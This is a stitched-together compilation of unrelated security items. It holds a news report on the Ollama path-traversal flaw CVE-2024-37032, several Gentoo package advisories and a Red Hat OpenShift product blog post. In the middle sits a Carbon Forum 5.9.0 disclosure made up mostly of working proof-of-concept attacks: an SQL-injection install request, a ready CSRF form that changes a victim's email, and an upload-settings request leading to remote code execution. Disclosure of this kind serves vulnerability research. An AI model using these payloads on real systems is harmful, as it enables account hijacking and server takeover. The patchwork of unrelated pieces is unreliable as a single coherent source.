Cybersecurity researchers have detailed a now-patch security flaw affecting the Ollama open-source artificial intelligence (AI) infrastructure platform that could be exploited to achieve remote code execution.
Tracked as CVE-2024-37032, the vulnerability has been codenamed Probllama by cloud security firm Wiz. Following responsible disclosure on May 5, 2024, the issue was addressed in version

Artificial Intelligence / Cloud Security

Cybersecurity researchers have detailed a now-patch security flaw affecting the Ollama open-source artificial intelligence (AI) infrastructure platform that could be exploited to achieve remote code execution.

Tracked as **CVE-2024-37032**, the vulnerability has been codenamed Probllama by cloud security firm Wiz. Following responsible disclosure on May 5, 2024, the issue was addressed in version 0.1.34 released on May 7, 2024.

Ollama is a service for packaging, deploying, running large language models (LLMs) locally on Windows, Linux, and macOS devices.

At its core, the issue relates to a case of insufficient input validation that results in a path traversal flaw an attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution.

The shortcoming requires the threat actor to send specially crafted HTTP requests to the Ollama API server for successful exploitation.

It specifically takes advantage of the API endpoint "/api/pull" – which is used to download a model from the official registry or from a private repository – to provide a malicious model manifest file that contains a path traversal payload in the digest field.

This issue could be abused not only to corrupt arbitrary files on the system, but also to obtain code execution remotely by overwriting a configuration file ("etc/ld.so.preload") associated with the dynamic linker ("ld.so") to include a rogue shared library and launch it every time prior to executing any program.

While the risk of remote code execution is reduced to a great extent in default Linux installations due to the fact that the API server binds to localhost, it's not the case with docker deployments, where the API server is publicly exposed.

"This issue is extremely severe in Docker installations, as the server runs with \`root\` privileges and listens on \`0.0.0.0\` by default – which enables remote exploitation of this vulnerability," security researcher Sagi Tzadik said.

Compounding matters further is the inherent lack of authentication associated with Ollama, thereby allowing an attacker to exploit a publicly-accessible server to steal or tamper with AI models, and compromise self-hosted AI inference servers.

This also requires that such services are secured using middleware like reverse proxies with authentication. Wiz said it identified over 1,000 Ollama exposed instances hosting numerous AI models without any protection.

"CVE-2024-37032 is an easy-to-exploit remote code execution that affects modern AI infrastructure," Tzadik said. "Despite the codebase being relatively new and written in modern programming languages, classic vulnerabilities such as Path Traversal remain an issue."

The development comes as AI security company Protect AI warned of over 60 security defects affecting various open-source AI/ML tools, including critical issues that could lead to information disclosure, access to restricted resources, privilege escalation, and complete system takeover.

The most severe of these vulnerabilities is CVE-2024-22476 (CVSS score 10.0), an SQL injection flaw in Intel Neural Compressor software that could allow attackers to download arbitrary files from the host system. It was addressed in version 2.5.0.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical RCE Vulnerability Discovered in Ollama AI Infrastructure Tool

Gentoo Linux Security Advisory 202406-5 - Multiple vulnerabilities have been discovered in JHead, the worst of which may lead to arbitrary code execution. Versions greater than or equal to 3.08 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: JHead: Multiple Vulnerabilities  
     Date: June 22, 2024  
     Bugs: #876247, #879801, #908519  
       ID: 202406-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in JHead, the worst of  
which may lead to arbitrary code execution.

Background  
==========

JHead is an EXIF JPEG header manipulation tool.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
media-gfx/jhead  < 3.08        >= 3.08

Description  
===========

Multiple vulnerabilities have been discovered in JHead. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All JHead users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/jhead-3.08"

References  
==========

[ 1 ] CVE-2020-6624  
      https://nvd.nist.gov/vuln/detail/CVE-2020-6624  
[ 2 ] CVE-2020-6625  
      https://nvd.nist.gov/vuln/detail/CVE-2020-6625  
[ 3 ] CVE-2021-34055  
      https://nvd.nist.gov/vuln/detail/CVE-2021-34055  
[ 4 ] CVE-2022-28550  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28550  
[ 5 ] CVE-2022-41751  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41751

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-05

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-05

Gentoo Linux Security Advisory 202406-4 - A vulnerability has been discovered in LZ4, which can lead to memory corruption. Versions greater than or equal to 1.9.3-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: LZ4: Memory Corruption  
     Date: June 22, 2024  
     Bugs: #791952  
       ID: 202406-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in LZ4, which can lead to memory  
corruption.

Background  
==========

LZ4 is a lossless compression algorithm, providing compression speed >  
500 MB/s per core, scalable with multi-cores CPU. It features an  
extremely fast decoder, with speed in multiple GB/s per core, typically  
reaching RAM speed limits on multi-core systems.

Affected packages  
=================

Package       Vulnerable    Unaffected  
------------  ------------  ------------  
app-arch/lz4  < 1.9.3-r1    >= 1.9.3-r1

Description  
===========

An attacker who submits a crafted file to an application linked with lz4  
may be able to trigger an integer overflow, leading to calling of  
memmove() on a negative size argument, causing an out-of-bounds write  
and/or a crash.

Impact  
======

The greatest impact of this flaw is to availability, with some potential  
impact to confidentiality and integrity as well.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All LZ4 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-arch/lz4-1.9.3-r1"

References  
==========

[ 1 ] CVE-2021-3520  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3520

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-04

Gentoo Linux Security Advisory 202406-3 - A vulnerability has been discovered in RDoc, which can lead to execution of arbitrary code. Versions greater than or equal to 6.6.3.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: RDoc: Remote Code Cxecution  
     Date: June 22, 2024  
     Bugs: #927565  
       ID: 202406-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in RDoc, which can lead to execution  
of arbitrary code.

Background  
==========

RDoc produces HTML and command-line documentation for Ruby projects.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
dev-ruby/rdoc  < 6.6.3.1     >= 6.6.3.1

Description  
===========

A vulnerability has been discovered in RDoc. Please review the CVE  
identifier referenced below for details.

Impact  
======

When parsing .rdoc_options (used for configuration in RDoc) as a YAML  
file, object injection and resultant remote code execution are possible  
because there are no restrictions on the classes that can be restored.

When loading the documentation cache, object injection and resultant  
remote code execution are also possible if there were a crafted cache.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All RDoc users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-ruby/rdoc-6.6.3.1"

References  
==========

[ 1 ] CVE-2024-27281  
      https://nvd.nist.gov/vuln/detail/CVE-2024-27281

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-03

Carbon Forum version 5.9.0 suffers from access control, cross site request forgery, file upload, outdated library, and remote SQL injection vulnerabilities.

    {-} Title => Carbon Forum 5.9.0 - Multiple Exploits{-} Author => bRpsd [cy@Live.no]{-} Date Release => 22 June, 2024{-} Vendor => Carbon Forum <= 5.9.0    Homepage => https://www.94cb.com/  Download => https://github.com/lincanbin/Carbon-Forum  Vulnerable Versions => 5.9.0 >=  Tested Version => 5.9.0 on xampp Server.#######################################################################################Vulnerability #1 : Reset Administrator Password & Database settingsFile Path: http://localhost/Carbon-Forum/install/INFO: The install folder remains after installation which allows attackers to recreate a new DB and have an admin account by default through registering the first user##############################################################################################################################################################################Vulnerability #2 : SQL InjectionVulnerable Code: /Carbon-Forum/install/index.phpif ($_SERVER['REQUEST_METHOD'] == 'POST') {  $fp = fopen(__DIR__ . '/database.sql', "r") or die("SQL文件无法打开。  The SQL File could not be opened.");  //dobefore  if (isset($_POST["Language"]) && isset($_POST["DBHost"]) && isset($_POST["DBName"]) && isset($_POST["DBUser"]) && isset($_POST["DBPassword"])) {    $Language = $_POST['Language'];    $DBHost = $_POST['DBHost'];    $DBName = $_POST['DBName'];    $DBUser = $_POST['DBUser'];    $DBPassword = $_POST['DBPassword'];    $SearchServer = $_POST['SearchServer'];    $SearchPort = $_POST['SearchPort'];    $EnableMemcache = $_POST['EnableMemcache'];    $MemCachePrefix = $_POST['MemCachePrefix'];  } else {    die("An Unexpected Error Occured!");  }  //$WebsitePath = $_POST['WebsitePath'];  $WebsitePath = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];  if (preg_match('/(.*)\/install/i', $WebsitePath, $WebsitePathMatch)) {    $WebsitePath = $WebsitePathMatch[1];  } else {    $WebsitePath = '';  }  //初始化数据库操作类  require('../library/PDO.class.php');  $DB = new Db($DBHost, 3306, '', $DBUser, $DBPassword);  $DatabaseExist = $DB->single("SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME = :DBName", array('DBName' => $DBName));  if (empty($DatabaseExist)) {    $DB->query("CREATE DATABASE IF NOT EXISTS " . $DBName . ";");  }    POC Request:POST http://localhost/Carbon-Forum/install/?Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, br, zstdContent-Type: application/x-www-form-urlencodedContent-Length: 173Origin: http://localhostConnection: keep-aliveReferer: http://localhost/Carbon-Forum/install/Cookie: CarbonBBS_View=desktop; CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; PHPSESSID=addf2aa242dcb91d00faf41e6d6b07b3Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Language=en&DBHost=localhost&DBName=&DBUser=test'&DBPassword=&SearchServer=&SearchPort=&EnableMemcache=false&MemCachePrefix=carbon_&submit=安 装 / InstallResponse:SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1You can find the error back in the log.#######################################################################################################################################################################################################Vulnerability #3 : CSRF - Change users email File Path: http://localhost/Carbon-Forum/settingsMethod: POSTParameter : UserMailCode:Carbon-Forum/controller/settings.phpPOC:    case 'UpdateUserInfo':      $CurUserInfo['UserSex']      = intval(Request('POST', 'UserSex', 0));      $CurUserInfo['UserMail']     = IsEmail(Request('POST', 'UserMail', $CurUserInfo['UserMail'])) ? Request('POST', 'UserMail', $CurUserInfo['UserMail']) : $CurUserInfo['UserMail'];      $CurUserInfo['UserHomepage'] = CharCV(Request('POST', 'UserHomepage', $CurUserInfo['UserHomepage']));      $CurUserInfo['UserIntro']    = CharCV(Request('POST', 'UserIntro', $CurUserInfo['UserIntro']));      $UpdateUserInfoResult        = UpdateUserInfo(array(        'UserSex' => $CurUserInfo['UserSex'],        'UserMail' => $CurUserInfo['UserMail'],        'UserHomepage' => $CurUserInfo['UserHomepage'],        'UserIntro' => $CurUserInfo['UserIntro']      ));      if ($UpdateUserInfoResult) {        $UpdateUserInfoMessage = $Lang['Profile_Modified_Successfully'];<form method='POST' action='http://localhost/Carbon-Forum/settings'>        <input type="hidden" name="Action" value="UpdateUserInfo">        <input type="hidden" name="UserSex" value="0">        <input type="hidden" name="UserMail" value="changed@new-email.com">        <input type="hidden" name="UserHomepage" value="">        <input type="hidden" name="UserIntro" value="">      <input type='submit' value='submit'>    </form>    #######################################################################################################################################################################################################Vulnerability #4 : Arbitrary File Upload - RCE [Authenticated]Info: Administrator can change allowed files in dashboard -> parameterPOC POST:http://localhost/Carbon-Forum/dashboard#dashboard4Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, br, zstdContent-Type: application/x-www-form-urlencodedContent-Length: 14662Origin: http://localhostConnection: keep-aliveReferer: http://localhost/Carbon-Forum/dashboardCookie: CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; CarbonBBS_View=desktopUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Action=Parameter&UploadParameters=/* 前后端通信相关的配置,注释只允许使用多行方式 */ { /* 上传图片配置项 */ "imageActionName": "uploadimage", /* 执行上传图片的action名称 */ "imageFieldName": "upfile", /* 提交的图片表单名称 */ "imageMaxSize": 4096000, /* 上传大小限制，单位B */ "imageAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 上传图片格式显示 */ "imageCompressEnable": true, /* 是否压缩图片,默认是true */ "imageCompressBorder": 1600, /* 图片压缩最长边限制 */ "imageInsertAlign": "none", /* 插入的图片浮动方式 */ "imageUrlPrefix": "", /* 图片访问路径前缀 */ "imagePathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ /* {filename} 会替换成原文件名,配置这项需要注意中文乱码问题 */ /* {rand:6} 会替换成随机数,后面的数字是随机数的位数 */ /* {time} 会替换成时间戳 */ /* {yyyy} 会替换成四位年份 */ /* {yy} 会替换成两位年份 */ /* {mm} 会替换成两位月份 */ /* {dd} 会替换成两位日期 */ /* {hh} 会替换成两位小时 */ /* {ii} 会替换成两位分钟 */ /* {ss} 会替换成两位秒 */ /* 非法字符 \ : * ? " < > | */ /* 具请体看线上文档: fex.baidu.com/ueditor/#use-format_upload_filename */ /* 涂鸦图片上传配置项 */ "scrawlActionName": "uploadscrawl", /* 执行上传涂鸦的action名称 */ "scrawlFieldName": "upfile", /* 提交的图片表单名称 */ "scrawlPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "scrawlMaxSize": 2048000, /* 上传大小限制，单位B */ "scrawlUrlPrefix": "", /* 图片访问路径前缀 */ "scrawlInsertAlign": "none", "scrawlAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 截图工具上传 */ "snapscreenActionName": "uploadimage", /* 执行上传截图的action名称 */ "snapscreenPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "snapscreenUrlPrefix": "", /* 图片访问路径前缀 */ "snapscreenInsertAlign": "none", /* 插入的图片浮动方式 */ /* 抓取远程图片配置 */ "catcherLocalDomain": ["127.0.0.1", "localhost", "img.baidu.com"], "catcherActionName": "catchimage", /* 执行抓取远程图片的action名称 */ "catcherFieldName": "source", /* 提交的图片列表表单名称 */ "catcherPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "catcherUrlPrefix": "", /* 图片访问路径前缀 */ "catcherMaxSize": 2048000, /* 上传大小限制，单位B */ "catcherAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 抓取图片格式显示 */ /* 上传视频配置 */ "videoActionName": "uploadvideo", /* 执行上传视频的action名称 */ "videoFieldName": "upfile", /* 提交的视频表单名称 */ "videoPathFormat": "/upload/video/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "videoUrlPrefix": "", /* 视频访问路径前缀 */ "videoMaxSize": 20480000, /* 上传大小限制，单位B，默认20MB */ "videoAllowFiles": [ ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid"], /* 上传视频格式显示 */ /* 上传文件配置 */ "fileActionName": "uploadfile", /* controller里,执行上传视频的action名称 */ "fileFieldName": "upfile", /* 提交的文件表单名称 */ "filePathFormat": "/upload/file/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "fileUrlPrefix": "", /* 文件访问路径前缀 */ "fileMaxSize": 2048000, /* 上传大小限制，单位B，默认2MB */ "fileAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ], /* 上传文件格式显示 */ /* 列出指定目录下的图片 */ "imageManagerActionName": "listimage", /* 执行图片管理的action名称 */ "imageManagerListPath": "/upload/image/", /* 指定要列出图片的目录 */ "imageManagerListSize": 60, /* 每次列出文件数量 */ "imageManagerUrlPrefix": "", /* 图片访问路径前缀 */ "imageManagerInsertAlign": "none", /* 插入的图片浮动方式 */ "imageManagerAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 列出的文件类型 */ /* 列出指定目录下的文件 */ "fileManagerActionName": "listfile", /* 执行文件管理的action名称 */ "fileManagerListPath": "/upload/file/", /* 指定要列出文件的目录 */ "fileManagerUrlPrefix": "", /* 文件访问路径前缀 */ "fileManagerListSize": 60, /* 每次列出文件数量 */ "fileManagerAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ] /* 列出的文件类型 */ }&TextFilterParameter=/* 关键词过滤相关的配置,注释只允许使用多行方式 */ { /* 关键词均支持正则表达式，过多的过滤会影响性能 "fuck" : "f**k", 以上规则表示发表含fuck的内容，会被过滤为f**k "negro" : [false, 30], Don't issue text with "negro", or it will freeze for 30 seconds. "蛤" : [false, 30], 以上规则禁止发布含“蛤”的内容，并且尝试发表该内容的用户会被续(jin)掉(yan)30秒生命 "negro" : ["black", 30], "包子" : ["维尼", 30], 以上规则表示发表含"包子"的内容，会被过滤为"维尼"，并且在内容发表成功后，需要再等30秒才能发言 */ /* "fuck" : "f**k", "negro" : [false, 30], "蛤" : [false, 30], "negro" : ["black", 30], "包子" : ["维尼", 30] */ }&submit=Save settings##############################################################################################################################################################################Vulnerability #4 : Vulnerable PHPMailer libraryFile: /Carbon-Forum/library/PHPMailer.class.phpVersion: $Version = '5.2.16';#######################################################################################

Carbon Forum 5.9.0 Cross Site Request Forgery / SQL Injection

Gentoo Linux Security Advisory 202406-2 - A vulnerability has been discovered in Flatpak, which can lead to a sandbox escape. Versions greater than or equal to 1.14.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Flatpak: Sandbox Escape  
     Date: June 22, 2024  
     Bugs: #930202  
       ID: 202406-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Flatpak, which can lead to a  
sandbox escape.

Background  
==========

Flatpak is a Linux application sandboxing and distribution framework.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
sys-apps/flatpak  < 1.14.6      >= 1.14.6

Description  
===========

A vulnerability has been discovered in Flatpak. Please review the CVE  
identifier referenced below for details.

Impact  
======

A malicious or compromised Flatpak app could execute arbitrary code  
outside its sandbox in conjunction with xdg-desktop-portal.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Flatpak users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/flatpak-1.14.6"

References  
==========

[ 1 ] CVE-2024-32462  
      https://nvd.nist.gov/vuln/detail/CVE-2024-32462

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-02

Gentoo Linux Security Advisory 202406-1 - A vulnerability has been discovered in GLib, which can lead to privilege escalation. Versions greater than or equal to 2.78.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GLib: Privilege Escalation  
     Date: June 22, 2024  
     Bugs: #931507  
       ID: 202406-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in GLib, which can lead to privilege  
escalation.

Background  
==========

GLib is a library providing a number of GNOME's core objects and  
functions.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
dev-libs/glib  < 2.78.6      >= 2.78.6

Description  
===========

A vulnerability has been discovered in GLib. Please review the CVE  
identifier referenced below for details.

Impact  
======

When a GDBus-based client subscribes to signals from a trusted system  
service such as NetworkManager or logind on a shared computer, other  
users of the same computer can send spoofed D-Bus signals that the  
GDBus-based client will wrongly interpret as having been sent by the  
trusted system service. This could lead to the GDBus-based client  
behaving incorrectly, with an application-dependent impact.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All GLib users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-libs/glib-2.78.6"

References  
==========

[ 1 ] CVE-2024-34397  
      https://nvd.nist.gov/vuln/detail/CVE-2024-34397

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-01

Today we're excited to announce a new mechanism for admins to safely and easily customize an operating system deployment with highly refined needs while taking full advantage of the automation and power provided by Red Hat OpenShift. This means you don't have to second guess the need for special device drivers for uncommon hardware, system agents, or organizational demands that require more control over your host operating system.Red Hat OpenShift is designed to run on a wide variety of hardware and operational contexts. OpenShift runs so well in a variety of environments that admins rarely ne

Today we're excited to announce a new mechanism for admins to safely and easily customize an operating system deployment with highly refined needs while taking full advantage of the automation and power provided by Red Hat OpenShift. This means you don't have to second guess the need for special device drivers for uncommon hardware, system agents, or organizational demands that require more control over your host operating system.

Red Hat OpenShift is designed to run on a wide variety of hardware and operational contexts. OpenShift runs so well in a variety of environments that admins rarely need to intervene. But increasingly, we meet customers on the leading edge of innovation who want to modify default settings to provide the customized environment their business needs. For example, OpenShift clusters used for data science, artificial intelligence (AI), and machine learning (ML) workloads often require specialized hardware accelerators. Other workloads might be storage-bound or network-bound,  requiring specialized hardware such as storage or network interfaces for optimal performance.

**Customizing a node with Machine Config Operator (MCO)**

Included in each OpenShift cluster is the Machine Config Operator (MCO). The MCO modifies node operating system (OS) configurations, updates the node OS, and ensures that each node is in the desired configuration state. When the MCO rolls out a new configuration, it performs the following steps on each node until all nodes have received the updated configuration:

1.  Cordons the node. This indicates that the node is not available for additional workloads.
2.  Drains the node. This terminates all running workloads on the node, causing them to be rescheduled onto other nodes.
3.  Applies the new configuration. It writes any new config files, enables systemd units, sets kernel arguments, or installs a new OS (assuming an OpenShift cluster is being upgraded to a newer OpenShift version).
4.  Reboots the node.
5.  Uncordons the node. This indicates that the node may have workloads scheduled on it again.

**Customizing a node with On-Cluster Layering (OCL)**

Cluster administrators can provide a Containerfile with an RPM image that layers customized content, such as device drivers or other specialized software, on top of the base OS image. Available in OpenShift 4.16 in tech preview, On Cluster Layering provides a final Open Container Initiative (OCI) image that is automatically:

*   Built within the cluster
*   Pushed to an OCI image registry
*   Installed on each cluster node by default

Admins can customize the underlying cluster OS to take advantage of specialized hardware acceleration or enhanced security tooling without incurring the maintenance burden of keeping both the OS and the additional software up-to-date. Instead, cluster administrators can update the device drivers on all of their cluster nodes as soon as a new driver update is released with their custom image overlay. Those custom images can be kept up-to-date with each OpenShift upgrade.

For example, an admin of a cluster that requires additional tooling to enhance security and manage clusters effectively can now create a Containerfile that installs a logging or security agent onto the base image and configures the agent. On Cluster Layering takes the provided Containerfile, and builds and applies it to the same workflow that installs the OS on each cluster node.

**Automatic or manual? You decide.**

There are new opportunities for additional testing and automation to be added into this process. Any tooling that works with OCI container images, such as OpenShift Pipelines or security scans provided by Quay.io, can be used to verify the contents and functionality of these customized OS images before they're rolled out. Best of all, this process can be completely automated, as desired.

**Stay up-to-date**

OpenShift customers love how easy it is to upgrade to a new OpenShift release, and each new OpenShift release includes OS updates. On Cluster Layering works closely with the OpenShift upgrade mechanism to ensure that whenever an upgrade is performed, any customizations are applied to the new OpenShift release as well. A new customized OS image is automatically built before the upgrade process begins.

Optionally, cluster administrators can put this upgraded OS image through the same process to verify its contents and functionality before beginning the upgrade. Once built and tested, cluster administrators can start the upgrade process with the full confidence of knowing that not only do their updated OS images contain everything needed to get the best performance out of their hardware, but these images also have been tested and verified to work within their specific environment.

**Image Mode for OpenShift**

By now, you might have heard about Image mode for RHEL. As you might suspect, these changes are closely related. That's a big topic, but the most important things to understand are:

*   Conceptually, everything is the same. You can now use all the same cloud-native tools, patterns, and infrastructure you know from application containers and use them with full operating system container images. Almost everything you learn from customizing CoreOS nodes carries over to Image mode for RHEL (and the other way round).
*   While there are some current technical differences between the implementations in OpenShift and Image mode for RHEL, the approaches are actively converging.

The addition of On Cluster Layering to OpenShift provides a powerful mechanism to enable full control over OpenShift cluster nodes. It provides a self-contained solution for the creation and management of customized OS images within a cluster. This feature offers additional opportunities for testing and automation, providing full confidence in the contents and functionality of these custom OS images. By leveraging On Cluster Layering, cluster administrators can significantly reduce their maintenance burden while still enjoying the benefits of a fully automated and fully customized OpenShift environment.

Customize your Red Hat OpenShift nodes and keep them updated

